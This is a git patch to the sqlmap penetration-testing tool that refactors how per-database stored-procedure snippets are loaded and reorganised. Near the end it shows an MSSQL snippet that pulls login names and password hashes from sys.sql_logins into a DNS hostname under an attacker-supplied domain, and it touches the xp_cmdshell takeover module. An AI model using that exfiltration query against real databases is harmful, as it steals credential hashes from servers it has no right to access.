From 8d7912ad342b54919157fb86932a6423f4050742 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 15 Feb 2012 14:05:50 +0000 Subject: [PATCH] minor update and refactoring --- lib/core/common.py | 7 +++++-- lib/core/enums.py | 14 +++++++++++++- lib/takeover/xp_cmdshell.py | 3 ++- procs/{ => mssqlserver}/configure_xp_cmdshell.txt | 0 .../dns_request.txt} | 2 +- 5 files changed, 21 insertions(+), 5 deletions(-) rename procs/{ => mssqlserver}/configure_xp_cmdshell.txt (100%) rename procs/{mssql_dns_request.txt => mssqlserver/dns_request.txt} (61%) diff --git a/lib/core/common.py b/lib/core/common.py index c51d9ebe8..a4631cb31 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -61,6 +61,7 @@ from lib.core.convert import unicodeencode from lib.core.convert import urldecode from lib.core.convert import urlencode from lib.core.enums import DBMS +from lib.core.enums import DBMS_DIRECTORY_NAME from lib.core.enums import HTTPHEADER from lib.core.enums import HTTPMETHOD from lib.core.enums import OS @@ -1807,12 +1808,14 @@ def parseXmlFile(xmlFile, handler): parse(stream, handler) stream.close() -def getSPLSnippet(name, **variables): +def getSPLSnippet(dbms, name, **variables): """ Returns content of SPL snippet located inside "procs" directory """ - filename = os.path.join(paths.SQLMAP_PROCS_PATH, "%s.txt" % name) + _ = { DBMS.MSSQL: DBMS_DIRECTORY_NAME.MSSQL, DBMS.PGSQL: DBMS_DIRECTORY_NAME.PGSQL } + + filename = os.path.join(paths.SQLMAP_PROCS_PATH, _[dbms], "%s.txt" % name) checkFile(filename) retVal = readCachedFileContent(filename) diff --git a/lib/core/enums.py b/lib/core/enums.py index 704215c14..86c6aa31c 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -26,6 +26,7 @@ class SORT_ORDER: class DBMS: ACCESS = "Microsoft Access" + DB2 = "IBM DB2" FIREBIRD = "Firebird" MAXDB = "SAP MaxDB" MSSQL = "Microsoft SQL Server" @@ -34,7 +35,18 @@ class DBMS: PGSQL = "PostgreSQL" SQLITE = "SQLite" SYBASE = "Sybase" - DB2 = "IBM DB2" + +class DBMS_DIRECTORY_NAME: + ACCESS = "access" + DB2 = "db2" + FIREBIRD = "firebird" + MAXDB = "maxdb" + MSSQL = "mssqlserver" + MYSQL = "mysql" + ORACLE = "oracle" + PGSQL = "postgresql" + SQLITE = "sqlite" + SYBASE = "sybase" class CUSTOM_LOGGING: PAYLOAD = 9 diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index 87338dd84..ce41b168c 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py @@ -17,6 +17,7 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths +from lib.core.enums import DBMS from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.session import setXpCmdshellAvailability from lib.core.unescaper import unescaper @@ -63,7 +64,7 @@ class xp_cmdshell: debugMsg += "stored procedure" logger.debug(debugMsg) - cmd = getSPLSnippet("configure_xp_cmdshell", ENABLE=str(mode)) + cmd = getSPLSnippet(DBMS.MSSQL, "configure_xp_cmdshell", ENABLE=str(mode)) return cmd diff --git a/procs/configure_xp_cmdshell.txt b/procs/mssqlserver/configure_xp_cmdshell.txt similarity index 100% rename from procs/configure_xp_cmdshell.txt rename to procs/mssqlserver/configure_xp_cmdshell.txt diff --git a/procs/mssql_dns_request.txt b/procs/mssqlserver/dns_request.txt similarity index 61% rename from procs/mssql_dns_request.txt rename to procs/mssqlserver/dns_request.txt index b46f6bac9..c97a469fb 100644 --- a/procs/mssql_dns_request.txt +++ b/procs/mssqlserver/dns_request.txt @@ -1,4 +1,4 @@ -# Reference: http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf +# Reference: http://www.defcon.org/images/defcon-15/dc15-presentations/dc-15-karlsson.pdf DECLARE @host varchar(1024); SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins;